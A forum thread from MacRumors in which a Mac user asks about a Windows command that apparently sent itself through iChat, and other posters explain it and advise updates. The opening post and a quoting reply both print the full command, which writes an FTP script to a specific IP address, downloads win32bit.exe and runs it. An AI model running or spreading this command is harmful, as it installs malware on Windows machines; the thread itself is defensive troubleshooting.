Sidebar Sidebar
Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.

Mac = Zombie machine? Windows command line?

spaceboots06

spaceboots06

macrumors 6502a
Original poster
Jun 13, 2009
968
1
The Rotten Apple
Hello everyone!

I was using iChat today, left my computer on, did a few activities outside, came back and saw this in my chatbox.

%systemroot%\system32\cmd.exe

del eq&echo open 190.209.231.41 26031 >> eq&echo user 29370 28075 >> eq &echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq

j

These three messages were sent by me! To my friend! I don't even know what they mean. I know they have something to do with windows machines, and I know that del means delete, so I'm still trying to figure out what's going on. Something with the command line I assume.

Anyway, could this be something to do with zombie machines or whatever? I have no idea what is going on. I would have put this in Mac help, but it seems as if this could also be a Windows problem too. No idea.

Help!

Thanks.

Edit: Oh, yeah. Now Software Update wants me to update iTunes, QuickTime, Java and Security Update 2009-005. Should I do it?
 
That is not Mac (darwin) command line, that is Windows command line.
How it happened, I don't know.

Yes, update everything in Software Updater.
 
barr08 said:
Do you use VNC or any remote desktop utility?
Click to expand...

I have Jaadu VNC for my iPhone, allowing me to view my screen and control my screen from my iPhone, but it wasn't enabled. I also use a password on the screen sharing setting on my computer! I'm in a techy university right now, so could someone may have cracked the password or something and used my computer? Wouldn't they have tried to do more damage then they already attempted to do? Should I reformat my computer? I'm pretty bugged out right now.
 
Definitely weird. May have been a hi-jack attempt. Obviously you aren't going to have a system32 folder since you are on a mac.

It looks like its trying to install win32bit.exe into your system32 folder which is normally the location most viruses etc locate themselves.
 
spaceboots06 said:
Hello everyone!

I was using iChat today, left my computer on, did a few activities outside, came back and saw this in my chatbox.

%systemroot%\system32\cmd.exe

del eq&echo open 190.209.231.41 26031 >> eq&echo user 29370 28075 >> eq &echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq

j

These three messages were sent by me! To my friend! I don't even know what they mean. I know they have something to do with windows machines, and I know that del means delete, so I'm still trying to figure out what's going on. Something with the command line I assume.

Anyway, could this be something to do with zombie machines or whatever? I have no idea what is going on. I would have put this in Mac help, but it seems as if this could also be a Windows problem too. No idea.

Help!

Thanks.

Edit: Oh, yeah. Now Software Update wants me to update iTunes, QuickTime, Java and Security Update 2009-005. Should I do it?
Click to expand...

Definitely!!! ALWAYS stay on top of patches, since they usually contains critical security fixes.

It looks like you may have hit malware somewhere. Fortunately, it's a Windows-based malware so it had no effect on your Mac. It appears to connect to a server in Chile to download an actual Windows executable that then probably takes over a victim Windows PC. I don't think it actually ran in your case.

Of more concern to me was that it found a way to get onto your Mac. I suspect you may have possibly browsed somewhere that delivered hidden malware. Happened to NYtimes.com users last weekend (for example).

So best defense is to apply all updates, reboot, and make sure your antivirus definitions is up to date, too.
 
Alright, cool. No immediate damage done, seeing that the messages that were sent came from and went to Mac machines.

My question is though, where could this have came from? Did I download a bad program? Is my Screen Sharing thingy vulnerable? Any ideas? I'm about to disable Screen Sharing right now.

electroshock said:
Of more concern to me was that it found a way to get onto your Mac. I suspect you may have possibly browsed somewhere that delivered hidden malware. Happened to NYtimes.com users last weekend (for example).
Click to expand...

Yeah! That's what's freaking me out!!! This dumb chick told me to download this file sharing program called Shakes Peer and I listened. I think that's what the problem is, even though I only used it for about five minutes. Either that, or Screen Sharing.

I'm still very surprised that this was the only thing that happened, and that I'm not missing any files or there are no little prank things that the typical hacker person would do.
 
spaceboots06 said:
Hello everyone!

I was using iChat today, left my computer on, did a few activities outside, came back and saw this in my chatbox.

%systemroot%\system32\cmd.exe

del eq&echo open 190.209.231.41 26031 >> eq&echo user 29370 28075 >> eq &echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq
Click to expand...

Please tell me your chat response was something like:
ha ha ha ha ha
Click to expand...
 
mags631 said:
Please tell me your chat response was something like:
Click to expand...

Hahahahaha, sadly, no.

iShater said:
Are you sure it was coming from YOUR end? not something the other side accidentally pasted in the screen?
Click to expand...

It was coming from my end. I asked "WTF?" when I came back to the computer and the person said that they ignored the "gibberish." They thought nothing of it.
 
You must log in or register to reply here.
Register on MacRumors! This sidebar will go away, and you'll see fewer ads.
Top Bottom
Back